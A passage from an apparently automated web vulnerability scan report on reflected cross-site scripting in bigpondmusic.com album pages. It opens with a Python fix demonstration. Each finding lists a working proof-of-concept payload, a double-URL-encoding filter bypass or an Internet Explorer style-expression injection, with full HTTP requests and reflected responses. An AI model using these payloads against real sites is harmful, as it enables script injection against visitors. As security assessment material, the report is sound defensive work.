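    no escaping, so a ' in the data ends the literal."""
    return "s.channel = '%s';" % segment


def render_channel_fixed(segment: str) -> str:
    """Serialise the value as a JSON string literal (quotes and backslashes
    escaped, non-ASCII as \\uXXXX) and additionally escape < > & so the data
    cannot contain a literal </script> that would end the script block."""
    literal = json.dumps(segment)
    literal = (literal.replace("<", "\\u003c")
                      .replace(">", "\\u003e")
                      .replace("&", "\\u0026"))
    return "s.channel = %s;" % literal


_SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f"}


def parse_channel_assignment(js: str):
    """Minimal JS string-literal reader used to check rendered output.
    Returns (decoded string value, text after the closing quote). Anything
    other than ';' in the remainder means data escaped the literal."""
    prefix = "s.channel = "
    if not js.startswith(prefix):
        raise ValueError("unexpected statement")
    i = len(prefix)
    quote = js[i]
    if quote not in "'\"":
        raise ValueError("expected a string literal")
    i += 1
    out = []
    while i < len(js):
        ch = js[i]
        if ch == "\\":
            nxt = js[i + 1]
            if nxt == "u":
                out.append(chr(int(js[i + 2:i + 6], 16)))
                i += 6
            else:
                out.append(_SIMPLE_ESCAPES.get(nxt, nxt))
                i += 2
        elif ch == quote:
            return "".join(out), js[i + 1:]
        else:
            out.append(ch)
            i += 1
    raise ValueError("unterminated string literal")


# Constructed inputs: the decoded segment from finding 2.137, and a segment
# that would close the <script> element if left unescaped.
PROBE_SEGMENT = "albumc46a2';0a91471649d"
SCRIPT_CLOSE_SEGMENT = 'album"</script><script>alert(1)//'

if __name__ == "__main__":
    for seg in (PROBE_SEGMENT, SCRIPT_CLOSE_SEGMENT):
        print(render_channel_vulnerable(seg))
        print(render_channel_fixed(seg))
        print(parse_channel_assignment(render_channel_fixed(seg)))
```

With the probe from the report, the vulnerable rendering parses as the string albumc46a2 followed by ;0a91471649d'; outside it, which is exactly the string termination Burp flagged; the fixed rendering returns the whole segment as the string value and only ; after it. The better fix remains the one in the remediation note: do not put user data in a script block at all, and read it from a data attribute or a JSON endpoint instead.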

Request

GET /albumc46a2'%3b0a91471649d/susan-boyle/the-gift11 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88329


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumc46a2';0a91471649d';
   s.prop4 = 'susan-boyle';
   s.prop5 = 'the-gift11';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 +
...[SNIP]...

2.138. http://bigpondmusic.com/album/susan-boyle/the-gift11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/susan-boyle/the-gift11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 178a7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9a6fc79742 was submitted in the REST URL parameter 1. This input was echoed as 178a7"><script>alert(1)</script>e9a6fc79742 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album178a7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9a6fc79742/susan-boyle/the-gift11 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88010


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album178a7"><script>alert(1)</script>e9a6fc79742/susan-boyle/the-gift11" />
...[SNIP]...

2.139. http://bigpondmusic.com/album/susan-boyle/the-gift11 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/susan-boyle/the-gift11

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a090"style%3d"x%3aexpression(alert(1))"a680221f896 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5a090"style="x:expression(alert(1))"a680221f896 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/susan-boyle/the-gift11?5a090"style%3d"x%3aexpression(alert(1))"a680221f896=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 111091


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Susan Boyle - The Gift - Big
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/susan-boyle/the-gift11?5a090"style="x:expression(alert(1))"a680221f896=1" />
...[SNIP]...

2.140. http://bigpondmusic.com/album/taio-cruz/rokstarr2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/taio-cruz/rokstarr2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 602e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7eadba08219 was submitted in the REST URL parameter 1. This input was echoed as 602e6"><script>alert(1)</script>7eadba08219 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album602e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7eadba08219/taio-cruz/rokstarr2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88103


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album602e6"><script>alert(1)</script>7eadba08219/taio-cruz/rokstarr2" />
...[SNIP]...

2.141. http://bigpondmusic.com/album/taio-cruz/rokstarr2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/taio-cruz/rokstarr2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71002'%3bb52b77c9e1e was submitted in the REST URL parameter 1. This input was echoed as 71002';b52b77c9e1e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album71002'%3bb52b77c9e1e/taio-cruz/rokstarr2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87821


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album71002';b52b77c9e1e';
   s.prop4 = 'taio-cruz';
   s.prop5 = 'rokstarr2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|'
...[SNIP]...

2.142. http://bigpondmusic.com/album/taio-cruz/rokstarr2 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/taio-cruz/rokstarr2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57c97"style%3d"x%3aexpression(alert(1))"d7b1258e9f1 was submitted in the h parameter. This input was echoed as 57c97"style="x:expression(alert(1))"d7b1258e9f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/taio-cruz/rokstarr2?h=64970803157c97"style%3d"x%3aexpression(alert(1))"d7b1258e9f1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:24:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 119583


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Taio Cruz - Rokstarr - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/taio-cruz/rokstarr2?h=64970803157c97"style="x:expression(alert(1))"d7b1258e9f1" />
...[SNIP]...

2.143. http://bigpondmusic.com/album/taio-cruz/rokstarr2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/taio-cruz/rokstarr2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f37a"style%3d"x%3aexpression(alert(1))"764939ac8af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7f37a"style="x:expression(alert(1))"764939ac8af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/taio-cruz/rokstarr2?7f37a"style%3d"x%3aexpression(alert(1))"764939ac8af=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 119146


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Taio Cruz - Rokstarr - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/taio-cruz/rokstarr2?7f37a"style="x:expression(alert(1))"764939ac8af=1" />
...[SNIP]...

2.144. http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61a06%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd0cbc868bf was submitted in the REST URL parameter 1. This input was echoed as 61a06"><script>alert(1)</script>fd0cbc868bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album61a06%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd0cbc868bf/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88307


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album61a06"><script>alert(1)</script>fd0cbc868bf/tom-petty-and-the-heartbreakers/damn-the-torpedoes2" />
...[SNIP]...

2.145. http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66c43'%3bf6bdc372dd0 was submitted in the REST URL parameter 1. This input was echoed as 66c43';f6bdc372dd0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album66c43'%3bf6bdc372dd0/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87915


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album66c43';f6bdc372dd0';
   s.prop4 = 'tom-petty-and-the-heartbreakers';
   s.prop5 = 'damn-the-torpedoes2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|
...[SNIP]...

2.146. http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bdab"style%3d"x%3aexpression(alert(1))"842ee7acee9 was submitted in the h parameter. This input was echoed as 8bdab"style="x:expression(alert(1))"842ee7acee9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2?h=7653777758bdab"style%3d"x%3aexpression(alert(1))"842ee7acee9 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:25:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 139217


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Tom Petty And The Heartbreak
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2?h=7653777758bdab"style="x:expression(alert(1))"842ee7acee9" />
...[SNIP]...

2.147. http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c37f"style%3d"x%3aexpression(alert(1))"ce276fa3e26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c37f"style="x:expression(alert(1))"ce276fa3e26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2?8c37f"style%3d"x%3aexpression(alert(1))"ce276fa3e26=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:25:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 139838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Tom Petty And The Heartbreak
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2?8c37f"style="x:expression(alert(1))"ce276fa3e26=1" />
...[SNIP]...

2.148. http://bigpondmusic.com/album/uriah-heep/the-collection91 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
